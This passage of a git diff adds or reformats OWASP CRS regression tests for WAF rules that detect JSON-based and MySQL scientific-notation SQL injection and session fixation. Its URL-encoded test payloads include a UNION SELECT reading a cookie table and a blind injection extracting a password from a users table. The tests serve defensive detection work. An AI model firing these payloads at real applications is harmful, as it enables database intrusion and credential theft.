text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-7 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-8 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-9 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-10 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-11 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-12 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-13 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-14 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-15 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-16 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-17 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-18 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-19 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-20 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-21 + desc: | + JSON in SQL (ARGS) + decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-22 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-23 + desc: | + JSON in SQL (ARGS) + decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-24 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-25 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":"b"}' ? 'a' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-26 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":"b"}' ? 'a' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-27 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '[1,2]' ? '1' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-28 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '[1,2]' ? '1' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-29 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"name":"asd"}' ?| array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-30 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"name":"asd"}' ?| array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-31 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"name":"asd"}' ?& array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-32 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"name":"asd"}' ?& array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-33 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '[1,2,3]'::json ->> 2='3' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-34 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '[1,2,3]'::json ->> 2='3' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-35 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-36 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml new file mode 100644 index 0000000000..36b2515479 --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml @@ -0,0 +1,41 @@ +--- +meta: + author: "Xhoenix" + description: MySQL Scientific Notation bypass payloads Detection + enabled: true + name: 942560.yaml +tests: + - test_title: 942560-1 + desc: "Positive test for Scientific Notation in MySQL, e.g 1.e(" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" + version: HTTP/1.0 + output: + log_contains: id "942560" + - test_title: 942560-2 + desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "foo=1.e(ascii)" + version: HTTP/1.0 + output: + log_contains: id "942560" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 2e706ee6e4..0fda2219c2 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -1,32 +1,49 @@ --- - meta: - author: csanders-git - description: None - enabled: true - name: 943100.yaml - tests: - - - test_title: 943100-1 +meta: + author: csanders-git + description: None + enabled: true + name: 943100.yaml +tests: + - test_title: 943100-1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, - application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, - */* - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) - method: GET - port: 80 - uri: /foo.php?bar=blah - version: HTTP/1.1 - output: - log_contains: id "943100" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /foo.php?bar=blah + version: HTTP/1.1 + output: + log_contains: id "943100" + - test_title: 943100-2 + desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /foo.php?test=.cookie;expires= + version: HTTP/1.1 + output: + log_contains: id "943100" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index 03b554f548..b1c2f60329 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -1,91 +1,85 @@ --- - meta: - author: csanders-git - description: None - enabled: true - name: 943110.yaml - tests: - - - test_title: 943110-1 +meta: + author: csanders-git + description: None + enabled: true + name: 943110.yaml +tests: + - test_title: 943110-1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, - application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, - */* - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http://www.attackersite.com/test - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) - method: GET - port: 80 - uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 - version: HTTP/1.1 - output: - log_contains: id "943110" - - - test_title: 943110-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + log_contains: id "943110" + - test_title: 943110-2 desc: "session fixation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://localhost.attackersite.com/" - method: GET - port: 80 - uri: "/?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - - test_title: 943110-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_title: 943110-3 desc: "session fixation attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://attackersite.com/" - method: GET - port: 80 - uri: "/?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - - test_title: 943110-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_title: 943110-4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Referer: http://localhost/test - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) - method: GET - port: 80 - uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 - version: HTTP/1.1 - output: - no_log_contains: id "943110" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + no_log_contains: id "943110" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index a7b0ca84fa..71cf166d82 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -1,31 +1,27 @@ --- - meta: - author: csanders-git - description: None - enabled: true - name: 943120.yaml - tests: - - - test_title: 943120-1 +meta: + author: csanders-git + description: None + enabled: true + name: 943120.yaml +tests: + - test_title: 943120-1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, - application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, - */* - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) - method: GET - port: 80 - uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 - version: HTTP/1.1 - output: - log_contains: id "943120" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + log_contains: id "943120" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 52914eec3b..64075646f3 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,29 +1,26 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944000.yaml" - description: "Description" - tests: - - - test_title: 944000-1 - desc: Using text/plain Content-Type 